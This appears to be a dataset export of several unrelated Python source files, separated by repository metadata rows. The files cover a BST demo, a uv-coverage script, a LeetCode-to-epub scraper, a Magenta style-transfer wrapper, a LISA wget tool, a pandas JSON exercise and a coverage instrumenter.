if __name__ == "__main__":
    # Demo 1: three-node list -> balanced BST; inorder print should be sorted.
    head = LLNode(1)
    head.next = LLNode(2)
    head.next.next = LLNode(3)
    inorder(sorted_ll_to_bst(head))
    print()
    # Demo 2: seven-node list -> perfectly balanced BST of height 3.
    head = LLNode(1)
    head.next = LLNode(2)
    head.next.next = LLNode(3)
    head.next.next.next = LLNode(4)
    head.next.next.next.next = LLNode(5)
    head.next.next.next.next.next = LLNode(6)
    head.next.next.next.next.next.next = LLNode(7)
    inorder(sorted_ll_to_bst(head))
    print()
| 23.460317
| 93
| 0.635995
| 209
| 1,478
| 4.373206
| 0.315789
| 0.140044
| 0.131291
| 0.105033
| 0.278993
| 0.231947
| 0.161926
| 0.098468
| 0.098468
| 0.098468
| 0
| 0.014585
| 0.257781
| 1,478
| 62
| 94
| 23.83871
| 0.818596
| 0.133288
| 0
| 0.243902
| 0
| 0
| 0.006289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.073171
| 0
| 0.292683
| 0.04878
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9920d3efc1f0f760192d2dad03a56edd3268c51
| 556
|
py
|
Python
|
uvcoverage.py
|
haricash/bayesian-ionized-bubbles
|
c0de5d8ff66f797c72f119b1bc9b11ff8cc63ee6
|
[
"MIT"
] | null | null | null |
uvcoverage.py
|
haricash/bayesian-ionized-bubbles
|
c0de5d8ff66f797c72f119b1bc9b11ff8cc63ee6
|
[
"MIT"
] | null | null | null |
uvcoverage.py
|
haricash/bayesian-ionized-bubbles
|
c0de5d8ff66f797c72f119b1bc9b11ff8cc63ee6
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from modules.conversions import enu2uvw
# Antenna layout: row 0 and row 1 of the saved array feed the e/n
# (presumably east/north offset) arguments of enu2uvw — TODO confirm
# against modules.conversions.
data = np.load("uv-array.npy")
e = data[0,:].transpose()
n = data[1,:].transpose()

# Accumulate one (u, v) sample per hour-angle step.
uvarray = []
for i in range(120):
    # hour_angle stepped in increments of 1/30 over 120 iterations;
    # NOTE(review): declination/reference values look hard-coded for a
    # single target — confirm units and source with enu2uvw's docs.
    u,v = enu2uvw( wavelength=1.690,
    hour_angle=i/30,
    declination=0,
    ref_declination=-30,
    ref_hour_angle=0,
    e=e,
    n=n)
    # np.save("uv-coverage.npy",u)
    uvarray.append((u,v))

np.save("uv-coverage.npy",uvarray)
| 23.166667
| 41
| 0.526978
| 73
| 556
| 3.958904
| 0.534247
| 0.013841
| 0.055363
| 0.110727
| 0.131488
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046196
| 0.33813
| 556
| 24
| 42
| 23.166667
| 0.73913
| 0.05036
| 0
| 0
| 0
| 0
| 0.051233
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e99213e148fd6d67da5c28d0d36014f1bdd56a29
| 6,540
|
py
|
Python
|
main.py
|
Bishalsarang/Leetcode-Questions
|
9d0c938778343c073b631884cc38411ea0ac7cd3
|
[
"MIT"
] | 6
|
2021-09-17T12:26:59.000Z
|
2022-03-11T00:37:35.000Z
|
main.py
|
Bishalsarang/Leetcode-Questions
|
9d0c938778343c073b631884cc38411ea0ac7cd3
|
[
"MIT"
] | null | null | null |
main.py
|
Bishalsarang/Leetcode-Questions
|
9d0c938778343c073b631884cc38411ea0ac7cd3
|
[
"MIT"
] | null | null | null |
# Author: Bishal Sarang
import json
import os
import pickle
import time
import bs4
import colorama
import requests
from colorama import Back, Fore
from ebooklib import epub
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from utils import *
import epub_writer
# Initialize Colorama (autoreset restores default colors after each print)
colorama.init(autoreset=True)

# Run Chrome headless so scraping works without a visible window.
options = Options()
options.headless = True
# Disable Warning, Error and Info logs
# Show only fatal errors
options.add_argument("--log-level=3")
driver = webdriver.Chrome(options=options)

# Get upto which problem it is already scraped from track.conf file
completed_upto = read_tracker("track.conf")

# Load the previously accumulated epub chapter list so a restarted run
# continues where it left off.
with open('chapters.pickle', 'rb') as f:
    chapters = pickle.load(f)
def download(problem_num, url, title, solution_slug):
    """Scrape one LeetCode problem page and append it to out.html and
    the epub chapter list, then advance the progress tracker.

    Uses the module-level headless Chrome `driver`; failures are logged
    in red and the driver is shut down (see note in the except block).
    """
    print(
        Fore.BLACK + Back.CYAN + f"Fetching problem num " + Back.YELLOW + f" {problem_num} " + Back.CYAN + " with url " + Back.YELLOW + f" {url} ")
    n = len(title)
    try:
        driver.get(url)
        # Wait 20 secs or until div with id initial-loading disappears
        element = WebDriverWait(driver, 20).until(
            EC.invisibility_of_element_located((By.ID, "initial-loading"))
        )
        # Get current tab page source
        html = driver.page_source
        soup = bs4.BeautifulSoup(html, "html.parser")
        # Construct HTML: starred title banner plus the problem body div.
        title_decorator = '*' * n
        problem_title_html = title_decorator + f'<div id="title">{title}</div>' + '\n' + title_decorator
        problem_html = problem_title_html + str(
            soup.find("div", {"class": "content__u3I1 question-content__JfgR"})) + '<br><br><hr><br>'
        # Append Contents to a HTML file
        with open("out.html", "ab") as f:
            f.write(problem_html.encode(encoding="utf-8"))
        # create and append chapters to construct an epub
        c = epub.EpubHtml(title=title, file_name=f'chap_{problem_num}.xhtml', lang='hr')
        c.content = problem_html
        chapters.append(c)
        # Write List of chapters to pickle file
        dump_chapters_to_file(chapters)
        # Update upto which the problem is downloaded
        update_tracker('track.conf', problem_num)
        print(
            Fore.BLACK + Back.GREEN + f"Writing problem num " + Back.YELLOW + f" {problem_num} " + Back.GREEN + " with url " + Back.YELLOW + f" {url} ")
        print(Fore.BLACK + Back.GREEN + " successfull ")
        # print(f"Writing problem num {problem_num} with url {url} successfull")
    except Exception as e:
        print(Back.RED + f" Failed Writing!! {e} ")
        # NOTE(review): indentation was lost in this copy; driver.quit()
        # is reconstructed here in the failure path, which kills the
        # shared driver for all later downloads — confirm placement
        # against the original file.
        driver.quit()
def main():
# Fetch the list of free LeetCode algorithm problems, download the ones not
# yet recorded in track.conf (rate-limited), then assemble the epub.
# NOTE(review): leading indentation was lost in this copy; everything from
# here through the final `except` is this function's body -- re-indent to run.
MAXIMUM_NUMBER_OF_PROBLEMS_PER_INSTANCE = int(os.environ.get("MAXIMUM_NUMBER_OF_PROBLEMS", 400))
SLEEP_TIME_PER_PROBLEM_IN_SECOND = int(os.environ.get("SLEEP_TIME_PER_PROBLEM_IN_SECOND", 5))
# Leetcode API URL to get json of problems on algorithms categories
ALGORITHMS_ENDPOINT_URL = "https://leetcode.com/api/problems/algorithms/"
# Problem URL is of format ALGORITHMS_BASE_URL + question__title_slug
# If question__title_slug = "two-sum" then URL is https://leetcode.com/problems/two-sum
ALGORITHMS_BASE_URL = "https://leetcode.com/problems/"
# Load JSON from API
algorithms_problems_json = requests.get(ALGORITHMS_ENDPOINT_URL).content
algorithms_problems_json = json.loads(algorithms_problems_json)
# List to store question_title_slug
links = []
for child in algorithms_problems_json["stat_status_pairs"]:
# Only process free problems
if not child["paid_only"]:
question__title_slug = child["stat"]["question__title_slug"]
question__article__slug = child["stat"]["question__article__slug"]
question__title = child["stat"]["question__title"]
frontend_question_id = child["stat"]["frontend_question_id"]
difficulty = child["difficulty"]["level"]
links.append(
(question__title_slug, difficulty, frontend_question_id, question__title, question__article__slug))
# `completed_upto` is the module-level index restored from track.conf; there
# is new work whenever it is not already the last index of `links`.
has_new_problems = (completed_upto != len(links) - 1)
if has_new_problems:
# NOTE(review): this CSS is missing a ';' between "border-radius:3px" and
# "margin-top: 0", so both declarations are dropped by the parser -- fix
# in a code change (runtime string, left untouched here).
styles_str = "<style>pre{white-space:pre-wrap;background:#f7f9fa;padding:10px 15px;color:#263238;line-height:1.6;font-size:13px;border-radius:3px margin-top: 0;margin-bottom:1em;overflow:auto}b,strong{font-weight:bolder}#title{font-size:16px;color:#212121;font-weight:600;margin-bottom:10px}hr{height:10px;border:0;box-shadow:0 10px 10px -10px #8c8b8b inset}</style>"
with open("out.html", "ab") as f:
f.write(styles_str.encode(encoding="utf-8"))
# Sort by difficulty follwed by problem id in ascending order
links = sorted(links, key=lambda x: (x[1], x[2]))
# NOTE(review): the tracker stores an index into this sorted list; if
# LeetCode adds problems between runs the sort order shifts and resumed
# indices may skip/repeat problems -- confirm acceptable.
downloaded_now = 0
try:
for i in range(completed_upto + 1, len(links)):
question__title_slug, _, frontend_question_id, question__title, question__article__slug = links[i]
url = ALGORITHMS_BASE_URL + question__title_slug
title = f"{frontend_question_id}. {question__title}"
# Download each file as html and write chapter to chapters.pickle
download(i, url, title, question__article__slug)
downloaded_now += 1
if downloaded_now == MAXIMUM_NUMBER_OF_PROBLEMS_PER_INSTANCE:
break
# Sleep for 5 secs for each problem and 2 mins after every 30 problems
if i % 30 == 0:
print(f"Sleeping 120 secs\n")
time.sleep(120)
else:
print(f"Sleeping {SLEEP_TIME_PER_PROBLEM_IN_SECOND} secs\n")
time.sleep(SLEEP_TIME_PER_PROBLEM_IN_SECOND)
finally:
# Close the browser after download
driver.quit()
# Assemble the collected chapters into the final epub (epub_writer is
# defined elsewhere in this project).
try:
if has_new_problems:
epub_writer.write("Leetcode Questions.epub", "Leetcode Questions", "Anonymous", chapters)
print(Back.GREEN + "All operations successful")
else:
print(Back.GREEN + "No new problems found. Exiting")
except Exception as e:
print(Back.RED + f"Error making epub {e}")
if __name__ == "__main__":
main()
| 40.875
| 376
| 0.657034
| 843
| 6,540
| 4.888493
| 0.32503
| 0.041009
| 0.033002
| 0.018442
| 0.157001
| 0.138316
| 0.068915
| 0.068915
| 0.012618
| 0
| 0
| 0.015947
| 0.242508
| 6,540
| 159
| 377
| 41.132075
| 0.815906
| 0.166972
| 0
| 0.145631
| 0
| 0.009709
| 0.233517
| 0.096333
| 0.009709
| 0
| 0
| 0
| 0
| 1
| 0.019417
| false
| 0
| 0.15534
| 0
| 0.174757
| 0.087379
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e992f77a4ff4f3363d1bcb7a821282c7065578b8
| 4,985
|
py
|
Python
|
model/magenta_app.py
|
DesmondYuan/DeepMovement
|
b4f347f139d52c345b592bc712260fa579b6c9a8
|
[
"MIT"
] | null | null | null |
model/magenta_app.py
|
DesmondYuan/DeepMovement
|
b4f347f139d52c345b592bc712260fa579b6c9a8
|
[
"MIT"
] | null | null | null |
model/magenta_app.py
|
DesmondYuan/DeepMovement
|
b4f347f139d52c345b592bc712260fa579b6c9a8
|
[
"MIT"
] | 1
|
2020-12-31T14:44:38.000Z
|
2020-12-31T14:44:38.000Z
|
# Adapted from Magenta console commands
import os
from magenta.models.arbitrary_image_stylization import arbitrary_image_stylization_build_model as build_model
from magenta.models.image_stylization import image_utils
import numpy as np
import tensorflow.compat.v1 as tf
import tf_slim as slim
class Magenta_Model():
    """Magenta arbitrary-image-stylization model wrapped for scripted use.

    Builds the TF1 inference graph and restores weights once in ``__init__``;
    ``process_data`` loads a (content, style) image pair from glob patterns,
    and ``run`` writes one stylized JPEG per interpolation weight.
    """

    def __init__(self, checkpoint,
                 content_square_crop=False, style_square_crop=False,
                 style_image_size=256, content_image_size=256):
        tf.disable_v2_behavior()
        # NOTE(review): as_default() returns a context manager that is never
        # entered here, so ops land in the process-wide default graph.
        tf.Graph().as_default()
        sess = tf.Session()
        # Defines place holder for the style image.
        self.style_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
        if style_square_crop:
            # BUG FIX: original referenced the bare name `style_img_ph`
            # (NameError at runtime); use the attribute assigned above.
            style_img_preprocessed = image_utils.center_crop_resize_image(
                self.style_img_ph, style_image_size)
        else:
            style_img_preprocessed = image_utils.resize_image(self.style_img_ph,
                                                              style_image_size)
        # Defines place holder for the content image.
        content_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
        if content_square_crop:
            content_img_preprocessed = image_utils.center_crop_resize_image(
                content_img_ph, content_image_size)
        else:
            content_img_preprocessed = image_utils.resize_image(
                content_img_ph, content_image_size)
        # Defines the model (inference only: not trainable, no losses).
        stylized_images, _, _, bottleneck_feat = build_model.build_model(
            content_img_preprocessed,
            style_img_preprocessed,
            trainable=False,
            is_training=False,
            inception_end_point='Mixed_6e',
            style_prediction_bottleneck=100,
            adds_losses=False)
        # Restore weights from the newest checkpoint in the given directory.
        checkpoint = tf.train.latest_checkpoint(checkpoint)
        init_fn = slim.assign_from_checkpoint_fn(checkpoint, slim.get_variables_to_restore())
        sess.run([tf.local_variables_initializer()])
        init_fn(sess)
        # Keep the session and graph endpoints for process_data()/run().
        self.sess = sess
        self.stylized_images = stylized_images
        self.content_img_preprocessed = content_img_preprocessed
        self.style_img_preprocessed = style_img_preprocessed
        self.content_img_ph = content_img_ph
        self.bottleneck_feat = bottleneck_feat

    def process_data(self, style_images_paths, content_images_paths):
        """Load images matched by the two glob patterns and cache one pair.

        NOTE: the attributes set in the inner loop are overwritten on every
        iteration, so only the *last* (content, style) pair matched by the
        globs survives for ``run`` -- this mirrors the original behavior.
        """
        # Gets the list of the input images.
        style_img_list = tf.gfile.Glob(style_images_paths)
        content_img_list = tf.gfile.Glob(content_images_paths)
        for content_i, content_img_path in enumerate(content_img_list):
            content_img_np = image_utils.load_np_image_uint8(content_img_path)[:, :, :3]
            # Strip a 3-char extension plus dot (e.g. ".jpg") from the name.
            content_img_name = os.path.basename(content_img_path)[:-4]
            # Preprocessed content image (computed but not used further here).
            inp_img_croped_resized_np = self.sess.run(
                self.content_img_preprocessed, feed_dict={
                    self.content_img_ph: content_img_np})
            # Bottleneck features of the style prediction network for the
            # identity transform (the content image fed as its own style).
            identity_params = self.sess.run(
                self.bottleneck_feat, feed_dict={self.style_img_ph: content_img_np})
            for style_i, style_img_path in enumerate(style_img_list):
                style_img_name = os.path.basename(style_img_path)[:-4]
                style_image_np = image_utils.load_np_image_uint8(style_img_path)[:, :, :3]
                self.content_img_np = content_img_np
                self.style_image_np = style_image_np
                self.identity_params = identity_params
                self.style_img_name = style_img_name
                self.content_img_name = content_img_name

    def run(self, output_dir, interpolation_weights):
        """Write one stylized JPEG per weight in *interpolation_weights*.

        Each output interpolates between the identity (weight 0) and the
        full style (weight 1) in bottleneck space; files are named
        ``<content>_stylized_<style>_<i>.jpg`` in *output_dir*.
        """
        style_params = self.sess.run(
            self.bottleneck_feat, feed_dict={self.style_img_ph: self.style_image_np})
        for interp_i, wi in enumerate(interpolation_weights):
            stylized_image_res = self.sess.run(
                self.stylized_images,
                feed_dict={
                    self.bottleneck_feat:
                        self.identity_params * (1 - wi) + style_params * wi,
                    self.content_img_ph:
                        self.content_img_np
                })
            # Saves stylized image.
            image_utils.save_np_image(
                stylized_image_res,
                os.path.join(output_dir, '%s_stylized_%s_%d.jpg' %
                             (self.content_img_name, self.style_img_name, interp_i)))
# Driver code: build the model once, then stylize with weights 0.0 and 1.0
# (identity and full style).
magenta_model = Magenta_Model("/mnt/disks/ssd_disk/final/models/",
content_square_crop=False, style_square_crop=False,
style_image_size=256, content_image_size=256)
# NOTE(review): style_images_paths points at the *content_images* directory,
# same as content_images_paths; presumably it should reference a style-images
# directory -- confirm against the data layout.
magenta_model.process_data(style_images_paths="/mnt/disks/ssd_disk/final/data/content_images/*",
content_images_paths="/mnt/disks/ssd_disk/final/data/content_images/*")
magenta_model.run("/mnt/disks/ssd_disk/final/tmp/", [0., 1.])
| 39.88
| 109
| 0.664995
| 626
| 4,985
| 4.886581
| 0.215655
| 0.091533
| 0.04119
| 0.026152
| 0.366133
| 0.270677
| 0.218045
| 0.199738
| 0.147761
| 0.147761
| 0
| 0.008931
| 0.258776
| 4,985
| 124
| 110
| 40.201613
| 0.818945
| 0.064594
| 0
| 0.069767
| 0
| 0
| 0.039974
| 0.038255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034884
| false
| 0
| 0.069767
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e99385b476437e2b2258af182121e6b707636676
| 4,781
|
py
|
Python
|
lisa/base_tools/wget.py
|
anirudhrb/lisa
|
fe009802577c81e45ca2ff5a34d353878caa725d
|
[
"MIT"
] | 48
|
2018-05-19T17:46:34.000Z
|
2020-09-28T21:09:06.000Z
|
lisa/base_tools/wget.py
|
anirudhrb/lisa
|
fe009802577c81e45ca2ff5a34d353878caa725d
|
[
"MIT"
] | 1,261
|
2018-05-17T04:32:22.000Z
|
2020-11-23T17:29:13.000Z
|
lisa/base_tools/wget.py
|
anirudhrb/lisa
|
fe009802577c81e45ca2ff5a34d353878caa725d
|
[
"MIT"
] | 133
|
2018-05-15T23:12:14.000Z
|
2020-11-13T10:37:49.000Z
|
import re
from pathlib import PurePosixPath
from typing import TYPE_CHECKING, Optional, Type
from lisa.executable import Tool
from lisa.tools.ls import Ls
from lisa.tools.mkdir import Mkdir
from lisa.tools.powershell import PowerShell
from lisa.tools.rm import Rm
from lisa.util import LisaException, is_valid_url
if TYPE_CHECKING:
from lisa.operating_system import Posix
class Wget(Tool):
    """LISA tool wrapper for ``wget``: downloads a URL onto the node and
    returns the resulting file path parsed from wget's stdout."""

    # Matches wget's final status line, e.g. "... - 'path' saved" or
    # "File 'path' already there", capturing the file path (both ASCII and
    # typographic quote styles).
    __pattern_path = re.compile(
        r"([\w\W]*?)(-|File) (‘|')(?P<path>.+?)(’|') (saved|already there)"
    )

    @property
    def command(self) -> str:
        return "wget"

    @property
    def can_install(self) -> bool:
        return True

    def install(self) -> bool:
        # Install wget via the distro's package manager, then re-check.
        posix_os: Posix = self.node.os  # type: ignore
        posix_os.install_packages([self])
        return self._check_exists()

    def get(
        self,
        url: str,
        file_path: str = "",
        filename: str = "",
        overwrite: bool = True,
        executable: bool = False,
        sudo: bool = False,
        force_run: bool = False,
        timeout: int = 600,
    ) -> str:
        """Download *url* into *file_path* (or the node working path) as
        *filename* and return the actual downloaded file path.

        Raises LisaException when the path cannot be parsed from wget's
        output or the downloaded file does not exist on the node.
        """
        is_valid_url(url)
        # combine download file path
        # TODO: support current lisa folder in pathlib.
        # So that here can use the corresponding path format.
        if file_path:
            # create folder when it doesn't exist
            self.node.shell.mkdir(PurePosixPath(file_path), exist_ok=True)
            # BUG FIX: the target path must embed the requested filename; it
            # previously contained a literal "(unknown)" placeholder string.
            download_path = f"{file_path}/{filename}"
        else:
            download_path = f"{self.node.working_path}/{filename}"
        # remove existing file and dir to download again.
        download_pure_path = self.node.get_pure_path(download_path)
        if overwrite and self.node.shell.exists(download_pure_path):
            self.node.shell.remove(download_pure_path, recursive=True)
        command = f"'{url}' --no-check-certificate"
        if filename:
            # -O writes to the exact target file name.
            command = f"{command} -O {download_path}"
        else:
            # -P sets only the target directory; wget derives the name.
            command = f"{command} -P {download_path}"
        command_result = self.run(
            command,
            no_error_log=True,
            shell=True,
            sudo=sudo,
            force_run=force_run,
            timeout=timeout,
        )
        matched_result = self.__pattern_path.match(command_result.stdout)
        if matched_result:
            download_file_path = matched_result.group("path")
        else:
            raise LisaException(
                f"cannot find file path in stdout of '{command}', it may be caused "
                " due to failed download or pattern mismatch."
                f" stdout: {command_result.stdout}"
            )
        # Confirm the parsed path actually exists on the node.
        actual_file_path = self.node.execute(
            f"ls {download_file_path}", shell=True, sudo=sudo
        )
        if actual_file_path.exit_code != 0:
            raise LisaException(f"File {actual_file_path} doesn't exist.")
        if executable:
            self.node.execute(f"chmod +x {actual_file_path}", sudo=sudo)
        return actual_file_path.stdout

    def verify_internet_access(self) -> bool:
        """Best-effort probe: True when a test download from azure.com
        succeeds, False otherwise (failures are logged at debug level)."""
        try:
            result = self.get("https://www.azure.com", force_run=True)
            if result:
                return True
        except Exception as e:
            self._log.debug(
                f"Internet is not accessible, exception occurred with wget {e}"
            )
        return False

    @classmethod
    def _windows_tool(cls) -> Optional[Type[Tool]]:
        return WindowsWget
class WindowsWget(Wget):
    """Windows implementation of Wget: downloads via PowerShell
    ``Invoke-WebRequest`` instead of an external binary."""

    @property
    def command(self) -> str:
        # No external binary required; PowerShell performs the download.
        return ""

    def _check_exists(self) -> bool:
        return True

    def get(
        self,
        url: str,
        file_path: str = "",
        filename: str = "",
        overwrite: bool = True,
        executable: bool = False,
        sudo: bool = False,
        force_run: bool = False,
        timeout: int = 600,
    ) -> str:
        """Download *url* to ``file_path\\filename`` and return that path."""
        ls = self.node.tools[Ls]
        # BUG FIX: the target path must embed the requested filename; it
        # previously contained a literal "(unknown)" placeholder string.
        fullpath = f"{file_path}\\{filename}"
        # return if file exists and not overwrite
        # NOTE(review): this checks the *directory* (file_path), not the file
        # itself -- presumably it should test `fullpath`; confirm.
        if ls.path_exists(file_path, sudo=sudo) and not overwrite:
            self._log.debug(
                f"File {fullpath} already exists and rewrite is set to False"
            )
            # BUG FIX: previously fell through and re-downloaded anyway,
            # contradicting overwrite=False; return the existing file.
            return fullpath
        # create directory if it doesn't exist
        self.node.tools[Mkdir].create_directory(file_path, sudo=sudo)
        # TODO: add support for executables
        # remove existing file if present and download
        self.node.tools[Rm].remove_file(fullpath, sudo=sudo)
        self.node.tools[PowerShell].run_cmdlet(
            f"$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri '{url}'"
            f" -OutFile '{fullpath}'",
            sudo=sudo,
            force_run=force_run,
            timeout=timeout,
        )
        return fullpath
| 31.453947
| 87
| 0.590253
| 570
| 4,781
| 4.803509
| 0.282456
| 0.049671
| 0.025566
| 0.017531
| 0.185172
| 0.153397
| 0.115413
| 0.115413
| 0.087655
| 0.087655
| 0
| 0.002126
| 0.311232
| 4,781
| 151
| 88
| 31.662252
| 0.829335
| 0.078854
| 0
| 0.338843
| 0
| 0
| 0.159344
| 0.03369
| 0
| 0
| 0
| 0.006623
| 0
| 1
| 0.07438
| false
| 0
| 0.082645
| 0.041322
| 0.264463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e995e4148b59ca5a7b4ba1e5e2c168dedb8fd4e8
| 1,787
|
py
|
Python
|
Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/35_handle_deeply_nested_data.py
|
Ali-Parandeh/Data_Science_Playground
|
c529e9b3692381572de259e7c93938d6611d83da
|
[
"MIT"
] | null | null | null |
Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/35_handle_deeply_nested_data.py
|
Ali-Parandeh/Data_Science_Playground
|
c529e9b3692381572de259e7c93938d6611d83da
|
[
"MIT"
] | null | null | null |
Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/35_handle_deeply_nested_data.py
|
Ali-Parandeh/Data_Science_Playground
|
c529e9b3692381572de259e7c93938d6611d83da
|
[
"MIT"
] | 1
|
2021-03-10T09:40:05.000Z
|
2021-03-10T09:40:05.000Z
|
# Load other business attributes and set meta prefix
# FIX: json_normalize moved to the top-level pandas namespace in pandas 1.0;
# the old `from pandas.io.json import json_normalize` import is deprecated
# and removed in current pandas.
from pandas import json_normalize

# Flatten each business's nested "categories" records, carrying selected
# top-level fields along as "biz_"-prefixed meta columns.
# (`data` is the Yelp API response dict provided by the exercise context.)
flat_cafes = json_normalize(data["businesses"],
                            sep="_",
                            record_path="categories",
                            meta=['name',
                                  'alias',
                                  'rating',
                                  ['coordinates', 'latitude'],
                                  ['coordinates', 'longitude']],
                            meta_prefix='biz_')
# View the data
print(flat_cafes.head())
'''
<script.py> output:
alias title biz_name biz_alias biz_rating biz_coordinates_latitude biz_coordinates_longitude
0 coffee Coffee & Tea White Noise white-noise-brooklyn-2 4.5 40.689358 -73.988415
1 coffee Coffee & Tea Devocion devocion-brooklyn-3 4.0 40.688570 -73.983340
2 coffeeroasteries Coffee Roasteries Devocion devocion-brooklyn-3 4.0 40.688570 -73.983340
3 cafes Cafes Devocion devocion-brooklyn-3 4.0 40.688570 -73.983340
4 coffee Coffee & Tea Coffee Project NY coffee-project-ny-new-york 4.5 40.726990 -73.989220
Naming meta columns can get tedious for datasets with many attributes,
and code is susceptible to breaking if column names or nesting levels change.
In such cases, you may have to write a custom function and
employ techniques like recursion to handle the data.
'''
| 52.558824
| 154
| 0.493005
| 179
| 1,787
| 4.837989
| 0.553073
| 0.04157
| 0.051963
| 0.086605
| 0.148961
| 0.148961
| 0.148961
| 0.148961
| 0.148961
| 0.148961
| 0
| 0.100304
| 0.447678
| 1,787
| 34
| 155
| 52.558824
| 0.777102
| 0.035814
| 0
| 0
| 0
| 0
| 0.158635
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9960edde95bcaeefa3f37767c2580e46bec455b
| 2,310
|
py
|
Python
|
deprecated/obsolete/src/coverinst.py
|
Anirban166/tstl
|
73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e
|
[
"Apache-2.0"
] | 90
|
2015-04-07T10:26:53.000Z
|
2022-03-07T15:14:57.000Z
|
deprecated/obsolete/src/coverinst.py
|
Anirban166/tstl
|
73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e
|
[
"Apache-2.0"
] | 14
|
2015-10-13T16:25:59.000Z
|
2021-01-21T18:31:03.000Z
|
deprecated/obsolete/src/coverinst.py
|
Anirban166/tstl
|
73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e
|
[
"Apache-2.0"
] | 32
|
2015-04-07T10:41:29.000Z
|
2022-02-26T05:17:28.000Z
|
# Source-level coverage instrumenter: reads a Python file (argv[1]) and writes
# <name>_INST.py in which covertool.cover("<file>:<line>") calls are inserted
# before instrumentable statements, tracking indent changes heuristically.
# NOTE(review): leading indentation was lost in this copy of the file; the
# for/if bodies below must be re-indented before this script can run.
import sys
infn = sys.argv[1]
outfn = infn.split(".py")[0]+"_INST.py"
code = []
for l in open(infn):
code.append(l)
outf = open(outfn, 'w')
outf.write("import covertool\n")
# State for the line scanner below.
ln = 0
inComment = False
justEnded = False
currentIndent = 0
lineIndent = 0
okChangeIndent = False
skipNext = False
# Lines starting with these tokens are copied through uninstrumented.
doNotInstrument = ["class","def","import", "elif", "else:", "except", "}", "]", ")"]
# Lines starting with these may legitimately increase the indent level.
indentChangers = ["class", "def", "if", "elif", "else:", "for", "try:", "except", "while"]
# A line ending in one of these continues onto the next line.
skipNextChars = [",","\\"]
conditionals = ["if","elif", "else"]
for l in code:
ln += 1
ls = l.split()
# Toggle triple-quoted block state; the line containing the closing quotes
# is also copied through via justEnded.
if l.find('"""') != -1:
inComment = not inComment
justEnded = True
if inComment:
outf.write(l)
continue
if justEnded:
outf.write(l)
justEnded = False
continue
# Count leading spaces of this line.
lineIndent = 0
for c in l:
if c != " ":
break
else:
lineIndent += 1
# Decide whether to emit a cover() call before this line.
instrument = False
if (lineIndent > currentIndent):
if okChangeIndent and not skipNext:
currentIndent = lineIndent
instrument = True
else:
instrument = ls != []
currentIndent = lineIndent
if (ls != []) and ((ls[0] in doNotInstrument) or (ls[0][0] == "#")):
instrument = False
# One-line conditionals ("if x: y") are split so the suite body gets its
# own cover() call; the ls[-1][-1] != ":" test excludes block headers.
if (ls != []) and (ls[0] in conditionals) and (":" in l) and (ls[-1][-1] != ":"):
if ls[0] == "if":
ld = infn + ":" + str(ln)
outf.write((" " * lineIndent) + 'covertool.cover("' + ld + '")\n')
ld = infn + ":" + str(ln)+":True"
sc = l.split(":")
# Re-extract the suite body with leading spaces stripped.
sct = ""
started = False
for c in sc[1]:
if started or (c != " "):
started = True
sct += c
outf.write(sc[0] + ":" + "\n")
outf.write((" " * lineIndent) + ' covertool.cover("' + ld + '")\n')
outf.write((" " * lineIndent) + " " + sct + "\n")
okChangeIndent = False
skipNext = False
continue
if instrument:
ld = infn + ":" + str(ln)
outf.write((" " * lineIndent) + 'covertool.cover("' + ld + '")\n')
# Allow an indent increase next line only after a block header (or when
# this line is a continuation); l[-2] is the char before the newline.
